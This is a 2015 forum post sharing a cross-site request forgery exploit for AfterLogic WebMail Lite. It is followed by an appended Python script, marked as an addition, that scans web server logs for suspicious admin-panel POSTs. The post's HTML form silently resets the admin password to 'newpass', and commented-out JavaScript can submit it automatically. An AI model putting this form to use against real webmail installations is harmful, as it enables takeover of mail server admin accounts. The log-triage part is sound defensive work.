KhiZaRix
Posted March 28, 2015

AfterLogic WebMail Lite is a free web-based IMAP and SMTP email-client with Ajax interface. AfterLogic WebMail Lite is available for both PHP and ASP.NET platforms.

The version of AfterLogic WebMail Lite that is written in PHP is free and open-source software subject to the terms of the Affero General Public License (AGPL) version 3. The version written in ASP.NET is proprietary software available as freeware.

And is deployed over 5/20 mail servers, quite popular.

This exploit attempts to exploit the admin and get(s) us a new password to the admin panel which should be located at site.com/mail/adminpanel/index.php

<h2>After Logic Mail - Change Admin Password Exploit</h2>
<form action="http://localhost/webmail/adminpanel/index.php?submit" method="POST" id="security_form">
<input type="hidden" name="form_id" value="security">
<input type="text" class="wm_input" name="txtUserName" id="txtUserName" value="mailadm" size="30" />
<input type="password" class="wm_input" name="txtNewPassword" id="txtNewPassword" value="newpass" size="30" />
<input type="password" class="wm_input" name="txtConfirmNewPassword" id="txtConfirmNewPassword" value="newpass" size="30" />
<input type="submit" name="submit_btn" value="Save" id="automate">
</form>
<script>
//uncomment the second line for automation
//document.getElementById('automate').click();
</script>

Source: http://dl.packetstormsecurity.net/1503-exploits/afterlogic-bypass.txt
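An added example, not part of the original post or the Packet Storm advisory: a log triage check that flags POSTs to the admin panel's `index.php?submit` endpoint arriving with no Referer or with a Referer from another host, which is how a standalone form like the one in the post would appear when submitted from outside the admin panel. The Apache combined log format, the host names, the function name and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Apache "combined" log format (assumed; adapt the pattern to your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
ADMIN_SUFFIX = "/adminpanel/index.php"  # admin panel path named in the post

# Constructed sample lines (documentation IP ranges, hypothetical hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Mar/2015:10:01:02 +0000] "POST /webmail/adminpanel/index.php?submit HTTP/1.1" 200 512 "http://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.4 - - [28/Mar/2015:10:05:00 +0000] "POST /webmail/adminpanel/index.php?submit HTTP/1.1" 200 512 "http://mail.example.org/webmail/adminpanel/index.php" "Mozilla/5.0"',
    '192.0.2.9 - - [28/Mar/2015:10:06:00 +0000] "POST /mail/adminpanel/index.php?submit HTTP/1.1" 302 0 "-" "curl/7.40"',
    '192.0.2.9 - - [28/Mar/2015:10:07:00 +0000] "GET /mail/adminpanel/index.php HTTP/1.1" 200 900 "-" "curl/7.40"',
]

def suspicious_admin_posts(lines, site_hosts):
    """Return (ip, timestamp, reason) for admin-panel submit POSTs whose
    Referer is missing or does not belong to one of site_hosts."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith(ADMIN_SUFFIX):
            continue
        if "submit" not in url.query.split("&"):  # the form posts to index.php?submit
            continue
        ref = m["referer"]
        ref_host = urlsplit(ref).hostname if ref not in ("", "-") else None
        if ref_host is None:
            reason = "no-referer"
        elif ref_host.lower() not in site_hosts:
            reason = "off-site-referer"
        else:
            continue  # submitted from the admin panel's own pages
        hits.append((m["ip"], m["ts"], reason))
    return hits

if __name__ == "__main__":
    for hit in suspicious_admin_posts(SAMPLE_LOG, {"mail.example.org"}):
        print(hit)
```

The Referer header can be forged or stripped by privacy settings, so treat hits as leads to correlate with admin password changes rather than as proof.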